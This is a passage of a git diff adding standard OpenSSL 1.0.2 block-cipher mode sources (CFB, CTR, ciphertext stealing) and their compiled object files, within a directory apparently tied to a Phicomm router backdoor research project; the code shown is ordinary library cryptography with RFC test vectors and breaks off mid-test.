+}
+
+/* N.B. This expects the input to be packed, MS bit first */
+void CRYPTO_cfb128_1_encrypt(const unsigned char *in, unsigned char *out,
+                             size_t bits, const void *key,
+                             unsigned char ivec[16], int *num,
+                             int enc, block128_f block)
+{
+    size_t n;
+    unsigned char c[1], d[1];
+
+    assert(in && out && key && ivec && num);
+    assert(*num == 0);
+
+    for (n = 0; n < bits; ++n) {
+        c[0] = (in[n / 8] & (1 << (7 - n % 8))) ? 0x80 : 0;
+        cfbr_encrypt_block(c, d, 1, key, ivec, enc, block);
+        out[n / 8] = (out[n / 8] & ~(1 << (unsigned int)(7 - n % 8))) |
+            ((d[0] & 0x80) >> (unsigned int)(n % 8));
+    }
+}
+
+void CRYPTO_cfb128_8_encrypt(const unsigned char *in, unsigned char *out,
+                             size_t length, const void *key,
+                             unsigned char ivec[16], int *num,
+                             int enc, block128_f block)
+{
+    size_t n;
+
+    assert(in && out && key && ivec && num);
+    assert(*num == 0);
+
+    for (n = 0; n < length; ++n)
+        cfbr_encrypt_block(&in[n], &out[n], 8, key, ivec, enc, block);
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/modes/cfb128.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/modes/cfb128.o
new file mode 100644
index 0000000000000000000000000000000000000000..8542849e1f864ac0e58c5ab46ca3aa0d414c6fbd
GIT binary patch
literal 3160
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
QD*HoLq8)j*C>GlP4Gv#&m;e9(

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/modes/ctr128.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/modes/ctr128.c
new file mode 100644
index 0000000..f3bbcbf
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/modes/ctr128.c
@@ -0,0 +1,270 @@
+/* ====================================================================
+ * Copyright (c) 2008 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@openssl.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ */
+
+#include <openssl/crypto.h>
+#include "modes_lcl.h"
+#include <string.h>
+
+#ifndef MODES_DEBUG
+# ifndef NDEBUG
+#  define NDEBUG
+# endif
+#endif
+#include <assert.h>
+
+/*
+ * NOTE: the IV/counter CTR mode is big-endian.  The code itself is
+ * endian-neutral.
+ */
+
+/* increment counter (128-bit int) by 1 */
+static void ctr128_inc(unsigned char *counter)
+{
+    u32 n = 16;
+    u8 c;
+
+    do {
+        --n;
+        c = counter[n];
+        ++c;
+        counter[n] = c;
+        if (c)
+            return;
+    } while (n);
+}
+
+#if !defined(OPENSSL_SMALL_FOOTPRINT)
+static void ctr128_inc_aligned(unsigned char *counter)
+{
+    size_t *data, c, n;
+    const union {
+        long one;
+        char little;
+    } is_endian = {
+        1
+    };
+
+    if (is_endian.little) {
+        ctr128_inc(counter);
+        return;
+    }
+
+    data = (size_t *)counter;
+    n = 16 / sizeof(size_t);
+    do {
+        --n;
+        c = data[n];
+        ++c;
+        data[n] = c;
+        if (c)
+            return;
+    } while (n);
+}
+#endif
+
+/*
+ * The input encrypted as though 128bit counter mode is being used.  The
+ * extra state information to record how much of the 128bit block we have
+ * used is contained in *num, and the encrypted counter is kept in
+ * ecount_buf.  Both *num and ecount_buf must be initialised with zeros
+ * before the first call to CRYPTO_ctr128_encrypt(). This algorithm assumes
+ * that the counter is in the x lower bits of the IV (ivec), and that the
+ * application has full control over overflow and the rest of the IV.  This
+ * implementation takes NO responsability for checking that the counter
+ * doesn't overflow into the rest of the IV when incremented.
+ */
+void CRYPTO_ctr128_encrypt(const unsigned char *in, unsigned char *out,
+                           size_t len, const void *key,
+                           unsigned char ivec[16],
+                           unsigned char ecount_buf[16], unsigned int *num,
+                           block128_f block)
+{
+    unsigned int n;
+    size_t l = 0;
+
+    assert(in && out && key && ecount_buf && num);
+    assert(*num < 16);
+
+    n = *num;
+
+#if !defined(OPENSSL_SMALL_FOOTPRINT)
+    if (16 % sizeof(size_t) == 0) { /* always true actually */
+        do {
+            while (n && len) {
+                *(out++) = *(in++) ^ ecount_buf[n];
+                --len;
+                n = (n + 1) % 16;
+            }
+
+# if defined(STRICT_ALIGNMENT)
+            if (((size_t)in | (size_t)out | (size_t)ivec) % sizeof(size_t) !=
+                0)
+                break;
+# endif
+            while (len >= 16) {
+                (*block) (ivec, ecount_buf, key);
+                ctr128_inc_aligned(ivec);
+                for (; n < 16; n += sizeof(size_t))
+                    *(size_t *)(out + n) =
+                        *(size_t *)(in + n) ^ *(size_t *)(ecount_buf + n);
+                len -= 16;
+                out += 16;
+                in += 16;
+                n = 0;
+            }
+            if (len) {
+                (*block) (ivec, ecount_buf, key);
+                ctr128_inc_aligned(ivec);
+                while (len--) {
+                    out[n] = in[n] ^ ecount_buf[n];
+                    ++n;
+                }
+            }
+            *num = n;
+            return;
+        } while (0);
+    }
+    /* the rest would be commonly eliminated by x86* compiler */
+#endif
+    while (l < len) {
+        if (n == 0) {
+            (*block) (ivec, ecount_buf, key);
+            ctr128_inc(ivec);
+        }
+        out[l] = in[l] ^ ecount_buf[n];
+        ++l;
+        n = (n + 1) % 16;
+    }
+
+    *num = n;
+}
+
+/* increment upper 96 bits of 128-bit counter by 1 */
+static void ctr96_inc(unsigned char *counter)
+{
+    u32 n = 12;
+    u8 c;
+
+    do {
+        --n;
+        c = counter[n];
+        ++c;
+        counter[n] = c;
+        if (c)
+            return;
+    } while (n);
+}
+
+void CRYPTO_ctr128_encrypt_ctr32(const unsigned char *in, unsigned char *out,
+                                 size_t len, const void *key,
+                                 unsigned char ivec[16],
+                                 unsigned char ecount_buf[16],
+                                 unsigned int *num, ctr128_f func)
+{
+    unsigned int n, ctr32;
+
+    assert(in && out && key && ecount_buf && num);
+    assert(*num < 16);
+
+    n = *num;
+
+    while (n && len) {
+        *(out++) = *(in++) ^ ecount_buf[n];
+        --len;
+        n = (n + 1) % 16;
+    }
+
+    ctr32 = GETU32(ivec + 12);
+    while (len >= 16) {
+        size_t blocks = len / 16;
+        /*
+         * 1<<28 is just a not-so-small yet not-so-large number...
+         * Below condition is practically never met, but it has to
+         * be checked for code correctness.
+         */
+        if (sizeof(size_t) > sizeof(unsigned int) && blocks > (1U << 28))
+            blocks = (1U << 28);
+        /*
+         * As (*func) operates on 32-bit counter, caller
+         * has to handle overflow. 'if' below detects the
+         * overflow, which is then handled by limiting the
+         * amount of blocks to the exact overflow point...
+         */
+        ctr32 += (u32)blocks;
+        if (ctr32 < blocks) {
+            blocks -= ctr32;
+            ctr32 = 0;
+        }
+        (*func) (in, out, blocks, key, ivec);
+        /* (*ctr) does not update ivec, caller does: */
+        PUTU32(ivec + 12, ctr32);
+        /* ... overflow was detected, propogate carry. */
+        if (ctr32 == 0)
+            ctr96_inc(ivec);
+        blocks *= 16;
+        len -= blocks;
+        out += blocks;
+        in += blocks;
+    }
+    if (len) {
+        memset(ecount_buf, 0, 16);
+        (*func) (ecount_buf, ecount_buf, 1, key, ivec);
+        ++ctr32;
+        PUTU32(ivec + 12, ctr32);
+        if (ctr32 == 0)
+            ctr96_inc(ivec);
+        while (len--) {
+            out[n] = in[n] ^ ecount_buf[n];
+            ++n;
+        }
+    }
+
+    *num = n;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/modes/ctr128.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/modes/ctr128.o
new file mode 100644
index 0000000000000000000000000000000000000000..a41881185d77c2e237d6f26059d0939681f7ec58
GIT binary patch
literal 2440
zcmbtU|7%-S6u+-|ZJ%3s$u!eIWs49nMfXV3x+VS~eQC4ahc8oSYbRRMw8mCu(~!Q{
zR)z|pqjxbnLHt|BelcCwStbmjDzimVhu9hGs^ZtVJ<oZ$uZ^!62p+iioclTVoOAEz
zet9FQA8io?Vv9f?BReA-C1jy($L_Jr9^xi@$vH0!D%7NGg$jS(7K-A0wRmIcoVzLf
zi|4>!>JVigr`U&-T~?n-u`BAJ#(q@?H1_x4)3o$MjFydHzI<SQ-3Ze8s&SBgu9+7#
zbJ<){&$wkZss~MKu9U8M)P<B;yQ)=AwGzsfDLWPP(lT_ZiYRKG8?^HVViGOg^1M1o
zSzj=uv)^=P>R<*a8wmQ%f#56v8%Ipjq-6l~GP<A(m2P@w{On6w)`L=MNlKM{;Z&FJ
zu+Dsu+BI6*^hVZe??PFPRq5iUsFl9jq9-@EFt<d7Wg}LvC46DmSiNnUm|lw4j1IPD
zE@>6fr&aX*BymP0YE-;8u^<Yyud#Zb`Dy85?73m}d39KQK}|2!i38SlQ^r<-wGf7l
zltc5I$l5xvw!v9jR?moSYP1ho`>6CSu$BbY)N;SuvqE8)p40EcQPB@P(Br|Mhvud6
zn=|c{t<lBr#Y(rAvMn0_Y`T?p{v4^o4*fd&F~$DS*>{xbz&da#!9FKo4SwWNLfX9S
z(tOo(MP)PYVh~uyseYX5MUFPsZXxFgL4X&Dp^M*$v~yJxKGlRzu8-iEz)p^NhOne`
z9v25iRnNXQi`(CMMaitP3!cj=8*&#VJk2*Dvrq$??_nDzY~LrUQD2+7FwjbB*Dan{
z2<Qzp&`bJzdmjyi21koIqZo)QT}t>+<VevPMqZDGm2h`w9fn0%B0`T>zZF{lu|d*8
zNEI;`G!$Q55#hDtM40so9qxANENlT|?&rSyxJE4Oz$lFSI2OmPAC<lDv^*~R-*zSC
zKt)W-p|@K5<nZY>RgRU~`{cZ9k08fXIjqW|gd9l7{)FsJ$P$ENuCqK>dOKJ0PPzK!
z5m(opa`7~~6s8r)Pv$NM0IsG#3gW<86LD>`xZ~UdW=lgJo4frSx5u`|NSAdwX#HDU
zq~SAbaJfi(!)V8J!Oom=5P-X3JqmYNX9V^m93MwQKrFt|7&8iyXiOR7M*8KPWyTL%
zR`2m=pB#81U7wWB=Ee$hd4n`XaZ*<lQ=$Z{9=WMEJ|x`^+~x)E0*XD~UjKV_cpJCZ
zPn7AoNh31~+9=fZgl!qwS%WAqW{eC`MyIEVGB!0inau%~n=-NrJc~oqMrQ0JACKpX
zO1?0a&lZe1q7<^PWR&bg`lUi<GRuqq57hy&NV)T5dw9-Ej;qFxhkFTm04&7p_iH=a
zoB($?;~xYZ-<os!e~o__Vlk)v4}fWj9siIGaBbJOHQqbhZk!r%F31sY&rO1Xx8Fe%
ziShV=J&|kNYoiRq0P8#BPw@Dwjg!H4#-9KTUs(^dMycWl3o>H$gxm!h*J;Q5Io_-`
ty2AYF#yC0nkL-o!jK{pqsG8vQp8|iQIJw>j&Svoeej&#jgTZ#j{{sdgqcQ*h

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/modes/cts128.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/modes/cts128.c
new file mode 100644
index 0000000..137be59
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/modes/cts128.c
@@ -0,0 +1,544 @@
+/* ====================================================================
+ * Copyright (c) 2008 The OpenSSL Project. All rights reserved.
+ *
+ * Rights for redistribution and usage in source and binary
+ * forms are granted according to the OpenSSL license.
+ */
+
+#include <openssl/crypto.h>
+#include "modes_lcl.h"
+#include <string.h>
+
+#ifndef MODES_DEBUG
+# ifndef NDEBUG
+#  define NDEBUG
+# endif
+#endif
+#include <assert.h>
+
+/*
+ * Trouble with Ciphertext Stealing, CTS, mode is that there is no
+ * common official specification, but couple of cipher/application
+ * specific ones: RFC2040 and RFC3962. Then there is 'Proposal to
+ * Extend CBC Mode By "Ciphertext Stealing"' at NIST site, which
+ * deviates from mentioned RFCs. Most notably it allows input to be
+ * of block length and it doesn't flip the order of the last two
+ * blocks. CTS is being discussed even in ECB context, but it's not
+ * adopted for any known application. This implementation provides
+ * two interfaces: one compliant with above mentioned RFCs and one
+ * compliant with the NIST proposal, both extending CBC mode.
+ */
+
+size_t CRYPTO_cts128_encrypt_block(const unsigned char *in,
+                                   unsigned char *out, size_t len,
+                                   const void *key, unsigned char ivec[16],
+                                   block128_f block)
+{
+    size_t residue, n;
+
+    assert(in && out && key && ivec);
+
+    if (len <= 16)
+        return 0;
+
+    if ((residue = len % 16) == 0)
+        residue = 16;
+
+    len -= residue;
+
+    CRYPTO_cbc128_encrypt(in, out, len, key, ivec, block);
+
+    in += len;
+    out += len;
+
+    for (n = 0; n < residue; ++n)
+        ivec[n] ^= in[n];
+    (*block) (ivec, ivec, key);
+    memcpy(out, out - 16, residue);
+    memcpy(out - 16, ivec, 16);
+
+    return len + residue;
+}
+
+size_t CRYPTO_nistcts128_encrypt_block(const unsigned char *in,
+                                       unsigned char *out, size_t len,
+                                       const void *key,
+                                       unsigned char ivec[16],
+                                       block128_f block)
+{
+    size_t residue, n;
+
+    assert(in && out && key && ivec);
+
+    if (len < 16)
+        return 0;
+
+    residue = len % 16;
+
+    len -= residue;
+
+    CRYPTO_cbc128_encrypt(in, out, len, key, ivec, block);
+
+    if (residue == 0)
+        return len;
+
+    in += len;
+    out += len;
+
+    for (n = 0; n < residue; ++n)
+        ivec[n] ^= in[n];
+    (*block) (ivec, ivec, key);
+    memcpy(out - 16 + residue, ivec, 16);
+
+    return len + residue;
+}
+
+size_t CRYPTO_cts128_encrypt(const unsigned char *in, unsigned char *out,
+                             size_t len, const void *key,
+                             unsigned char ivec[16], cbc128_f cbc)
+{
+    size_t residue;
+    union {
+        size_t align;
+        unsigned char c[16];
+    } tmp;
+
+    assert(in && out && key && ivec);
+
+    if (len <= 16)
+        return 0;
+
+    if ((residue = len % 16) == 0)
+        residue = 16;
+
+    len -= residue;
+
+    (*cbc) (in, out, len, key, ivec, 1);
+
+    in += len;
+    out += len;
+
+#if defined(CBC_HANDLES_TRUNCATED_IO)
+    memcpy(tmp.c, out - 16, 16);
+    (*cbc) (in, out - 16, residue, key, ivec, 1);
+    memcpy(out, tmp.c, residue);
+#else
+    memset(tmp.c, 0, sizeof(tmp));
+    memcpy(tmp.c, in, residue);
+    memcpy(out, out - 16, residue);
+    (*cbc) (tmp.c, out - 16, 16, key, ivec, 1);
+#endif
+    return len + residue;
+}
+
+size_t CRYPTO_nistcts128_encrypt(const unsigned char *in, unsigned char *out,
+                                 size_t len, const void *key,
+                                 unsigned char ivec[16], cbc128_f cbc)
+{
+    size_t residue;
+    union {
+        size_t align;
+        unsigned char c[16];
+    } tmp;
+
+    assert(in && out && key && ivec);
+
+    if (len < 16)
+        return 0;
+
+    residue = len % 16;
+
+    len -= residue;
+
+    (*cbc) (in, out, len, key, ivec, 1);
+
+    if (residue == 0)
+        return len;
+
+    in += len;
+    out += len;
+
+#if defined(CBC_HANDLES_TRUNCATED_IO)
+    (*cbc) (in, out - 16 + residue, residue, key, ivec, 1);
+#else
+    memset(tmp.c, 0, sizeof(tmp));
+    memcpy(tmp.c, in, residue);
+    (*cbc) (tmp.c, out - 16 + residue, 16, key, ivec, 1);
+#endif
+    return len + residue;
+}
+
+size_t CRYPTO_cts128_decrypt_block(const unsigned char *in,
+                                   unsigned char *out, size_t len,
+                                   const void *key, unsigned char ivec[16],
+                                   block128_f block)
+{
+    size_t residue, n;
+    union {
+        size_t align;
+        unsigned char c[32];
+    } tmp;
+
+    assert(in && out && key && ivec);
+
+    if (len <= 16)
+        return 0;
+
+    if ((residue = len % 16) == 0)
+        residue = 16;
+
+    len -= 16 + residue;
+
+    if (len) {
+        CRYPTO_cbc128_decrypt(in, out, len, key, ivec, block);
+        in += len;
+        out += len;
+    }
+
+    (*block) (in, tmp.c + 16, key);
+
+    memcpy(tmp.c, tmp.c + 16, 16);
+    memcpy(tmp.c, in + 16, residue);
+    (*block) (tmp.c, tmp.c, key);
+
+    for (n = 0; n < 16; ++n) {
+        unsigned char c = in[n];
+        out[n] = tmp.c[n] ^ ivec[n];
+        ivec[n] = c;
+    }
+    for (residue += 16; n < residue; ++n)
+        out[n] = tmp.c[n] ^ in[n];
+
+    return 16 + len + residue;
+}
+
+size_t CRYPTO_nistcts128_decrypt_block(const unsigned char *in,
+                                       unsigned char *out, size_t len,
+                                       const void *key,
+                                       unsigned char ivec[16],
+                                       block128_f block)
+{
+    size_t residue, n;
+    union {
+        size_t align;
+        unsigned char c[32];
+    } tmp;
+
+    assert(in && out && key && ivec);
+
+    if (len < 16)
+        return 0;
+
+    residue = len % 16;
+
+    if (residue == 0) {
+        CRYPTO_cbc128_decrypt(in, out, len, key, ivec, block);
+        return len;
+    }
+
+    len -= 16 + residue;
+
+    if (len) {
+        CRYPTO_cbc128_decrypt(in, out, len, key, ivec, block);
+        in += len;
+        out += len;
+    }
+
+    (*block) (in + residue, tmp.c + 16, key);
+
+    memcpy(tmp.c, tmp.c + 16, 16);
+    memcpy(tmp.c, in, residue);
+    (*block) (tmp.c, tmp.c, key);
+
+    for (n = 0; n < 16; ++n) {
+        unsigned char c = in[n];
+        out[n] = tmp.c[n] ^ ivec[n];
+        ivec[n] = in[n + residue];
+        tmp.c[n] = c;
+    }
+    for (residue += 16; n < residue; ++n)
+        out[n] = tmp.c[n] ^ tmp.c[n - 16];
+
+    return 16 + len + residue;
+}
+
+size_t CRYPTO_cts128_decrypt(const unsigned char *in, unsigned char *out,
+                             size_t len, const void *key,
+                             unsigned char ivec[16], cbc128_f cbc)
+{
+    size_t residue;
+    union {
+        size_t align;
+        unsigned char c[32];
+    } tmp;
+
+    assert(in && out && key && ivec);
+
+    if (len <= 16)
+        return 0;
+
+    if ((residue = len % 16) == 0)
+        residue = 16;
+
+    len -= 16 + residue;
+
+    if (len) {
+        (*cbc) (in, out, len, key, ivec, 0);
+        in += len;
+        out += len;
+    }
+
+    memset(tmp.c, 0, sizeof(tmp));
+    /*
+     * this places in[16] at &tmp.c[16] and decrypted block at &tmp.c[0]
+     */
+    (*cbc) (in, tmp.c, 16, key, tmp.c + 16, 0);
+
+    memcpy(tmp.c, in + 16, residue);
+#if defined(CBC_HANDLES_TRUNCATED_IO)
+    (*cbc) (tmp.c, out, 16 + residue, key, ivec, 0);
+#else
+    (*cbc) (tmp.c, tmp.c, 32, key, ivec, 0);
+    memcpy(out, tmp.c, 16 + residue);
+#endif
+    return 16 + len + residue;
+}
+
+size_t CRYPTO_nistcts128_decrypt(const unsigned char *in, unsigned char *out,
+                                 size_t len, const void *key,
+                                 unsigned char ivec[16], cbc128_f cbc)
+{
+    size_t residue;
+    union {
+        size_t align;
+        unsigned char c[32];
+    } tmp;
+
+    assert(in && out && key && ivec);
+
+    if (len < 16)
+        return 0;
+
+    residue = len % 16;
+
+    if (residue == 0) {
+        (*cbc) (in, out, len, key, ivec, 0);
+        return len;
+    }
+
+    len -= 16 + residue;
+
+    if (len) {
+        (*cbc) (in, out, len, key, ivec, 0);
+        in += len;
+        out += len;
+    }
+
+    memset(tmp.c, 0, sizeof(tmp));
+    /*
+     * this places in[16] at &tmp.c[16] and decrypted block at &tmp.c[0]
+     */
+    (*cbc) (in + residue, tmp.c, 16, key, tmp.c + 16, 0);
+
+    memcpy(tmp.c, in, residue);
+#if defined(CBC_HANDLES_TRUNCATED_IO)
+    (*cbc) (tmp.c, out, 16 + residue, key, ivec, 0);
+#else
+    (*cbc) (tmp.c, tmp.c, 32, key, ivec, 0);
+    memcpy(out, tmp.c, 16 + residue);
+#endif
+    return 16 + len + residue;
+}
+
+#if defined(SELFTEST)
+# include <stdio.h>
+# include <openssl/aes.h>
+
+/* test vectors from RFC 3962 */
+static const unsigned char test_key[16] = "chicken teriyaki";
+static const unsigned char test_input[64] =
+    "I would like the" " General Gau's C"
+    "hicken, please, " "and wonton soup.";
+static const unsigned char test_iv[16] =
+    { 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 };
+
+static const unsigned char vector_17[17] = {
+    0xc6, 0x35, 0x35, 0x68, 0xf2, 0xbf, 0x8c, 0xb4,
+    0xd8, 0xa5, 0x80, 0x36, 0x2d, 0xa7, 0xff, 0x7f,
+    0x97
+};
+
+static const unsigned char vector_31[31] = {
+    0xfc, 0x00, 0x78, 0x3e, 0x0e, 0xfd, 0xb2, 0xc1,
+    0xd4, 0x45, 0xd4, 0xc8, 0xef, 0xf7, 0xed, 0x22,
+    0x97, 0x68, 0x72, 0x68, 0xd6, 0xec, 0xcc, 0xc0,
+    0xc0, 0x7b, 0x25, 0xe2, 0x5e, 0xcf, 0xe5
+};
+
+static const unsigned char vector_32[32] = {
+    0x39, 0x31, 0x25, 0x23, 0xa7, 0x86, 0x62, 0xd5,
+    0xbe, 0x7f, 0xcb, 0xcc, 0x98, 0xeb, 0xf5, 0xa8,
+    0x97, 0x68, 0x72, 0x68, 0xd6, 0xec, 0xcc, 0xc0,
+    0xc0, 0x7b, 0x25, 0xe2, 0x5e, 0xcf, 0xe5, 0x84
+};
+
+static const unsigned char vector_47[47] = {
+    0x97, 0x68, 0x72, 0x68, 0xd6, 0xec, 0xcc, 0xc0,
+    0xc0, 0x7b, 0x25, 0xe2, 0x5e, 0xcf, 0xe5, 0x84,
+    0xb3, 0xff, 0xfd, 0x94, 0x0c, 0x16, 0xa1, 0x8c,
+    0x1b, 0x55, 0x49, 0xd2, 0xf8, 0x38, 0x02, 0x9e,
+    0x39, 0x31, 0x25, 0x23, 0xa7, 0x86, 0x62, 0xd5,
+    0xbe, 0x7f, 0xcb, 0xcc, 0x98, 0xeb, 0xf5
+};
+
+static const unsigned char vector_48[48] = {
+    0x97, 0x68, 0x72, 0x68, 0xd6, 0xec, 0xcc, 0xc0,
+    0xc0, 0x7b, 0x25, 0xe2, 0x5e, 0xcf, 0xe5, 0x84,
+    0x9d, 0xad, 0x8b, 0xbb, 0x96, 0xc4, 0xcd, 0xc0,
+    0x3b, 0xc1, 0x03, 0xe1, 0xa1, 0x94, 0xbb, 0xd8,
+    0x39, 0x31, 0x25, 0x23, 0xa7, 0x86, 0x62, 0xd5,
+    0xbe, 0x7f, 0xcb, 0xcc, 0x98, 0xeb, 0xf5, 0xa8
+};
+
+static const unsigned char vector_64[64] = {
+    0x97, 0x68, 0x72, 0x68, 0xd6, 0xec, 0xcc, 0xc0,
+    0xc0, 0x7b, 0x25, 0xe2, 0x5e, 0xcf, 0xe5, 0x84,
+    0x39, 0x31, 0x25, 0x23, 0xa7, 0x86, 0x62, 0xd5,
+    0xbe, 0x7f, 0xcb, 0xcc, 0x98, 0xeb, 0xf5, 0xa8,
+    0x48, 0x07, 0xef, 0xe8, 0x36, 0xee, 0x89, 0xa5,
+    0x26, 0x73, 0x0d, 0xbc, 0x2f, 0x7b, 0xc8, 0x40,
+    0x9d, 0xad, 0x8b, 0xbb, 0x96, 0xc4, 0xcd, 0xc0,
+    0x3b, 0xc1, 0x03, 0xe1, 0xa1, 0x94, 0xbb, 0xd8
+};
+
+static AES_KEY encks, decks;
+
+void test_vector(const unsigned char *vector, size_t len)
+{
+    unsigned char iv[sizeof(test_iv)];
+    unsigned char cleartext[64], ciphertext[64];
+    size_t tail;
+
+    printf("vector_%d\n", len);
+    fflush(stdout);
+
+    if ((tail = len % 16) == 0)
+        tail = 16;
+    tail += 16;
+
+    /* test block-based encryption */
+    memcpy(iv, test_iv, sizeof(test_iv));
+    CRYPTO_cts128_encrypt_block(test_input, ciphertext, len, &encks, iv,
+                                (block128_f) AES_encrypt);
+    if (memcmp(ciphertext, vector, len))
+        fprintf(stderr, "output_%d mismatch\n", len), exit(1);
